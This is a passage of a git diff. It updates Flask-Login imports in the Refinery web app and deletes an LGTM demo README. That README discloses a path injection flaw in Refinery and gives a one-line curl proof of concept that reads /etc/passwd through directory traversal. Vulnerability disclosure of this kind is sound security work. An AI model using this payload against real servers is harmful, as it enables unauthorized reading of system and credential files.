flask_sqlalchemy import SQLAlchemy -+from flask_login import LoginManager - from celery import Celery - - print "Opening a Refinery" -diff --git a/refinery/refinery/webapp/admin.py b/refinery/refinery/webapp/admin.py -index e6d26d4..23af1dd 100644 ---- a/refinery/refinery/webapp/admin.py -+++ b/refinery/refinery/webapp/admin.py -@@ -1,6 +1,6 @@ - from flask import g, redirect, render_template, session, url_for, flash #url_for, abort, render_template, flash, send_from_directory, jsonify, Response, json - from refinery import app, lm --from flask.ext.login import login_user, logout_user, login_required -+from flask_login import login_user, logout_user, login_required - from refinery.data.models import User - from flask_wtf import Form - from wtforms import TextField, PasswordField, BooleanField -diff --git a/refinery/refinery/webapp/main_menu.py b/refinery/refinery/webapp/main_menu.py -index 670c62e..6e5ca7f 100644 ---- a/refinery/refinery/webapp/main_menu.py -+++ b/refinery/refinery/webapp/main_menu.py -@@ -14,7 +14,7 @@ Or else what? Exactly. - """ - - from flask import request, g, render_template, jsonify, Response, json --from flask.ext.login import current_user,login_required -+from flask_login import current_user,login_required - - import celery - diff --git a/lgtm_demos/python/Refinery/README.md b/lgtm_demos/python/Refinery/README.md deleted file mode 100644 index 9fd9b22..0000000 --- a/lgtm_demos/python/Refinery/README.md +++ /dev/null @@ -1,11 +0,0 @@ -# Path injection in Refinery - -One of LGTM's default queries found a path injection vulnerability in the open source [Refinery](https://github.com/daeilkim/refinery) project: - -https://lgtm.com/projects/g/daeilkim/refinery/snapshot/5eb10ae26cc67ac3d39d37e932274798631e15b2/files/refinery/refinery/webapp/topicmodel.py#xaea6e729c50ca7a5:1 - -This bug is trivial to exploit. If Refinery is running on the website example.com, then an attacker can read arbitrary files on the server like this: - -curl -d "filename=../../../../../../../../../../../../etc/passwd" -X POST http://example.com/doc/get_doc_text - -Semmle reported this vulnerability to the maintainers of Refinery on 2018-12-16 (using the email addresses listed [here](https://github.com/daeilkim/refinery/blob/0d5de8fc3d680a2c79bd0e9384b506229787c74f/README.md)), but they did not respond. Kevin Backhouse also attempted to contact Daeil Kim using [LinkedIn](https://www.linkedin.com/in/daeil/), but did not receive a response.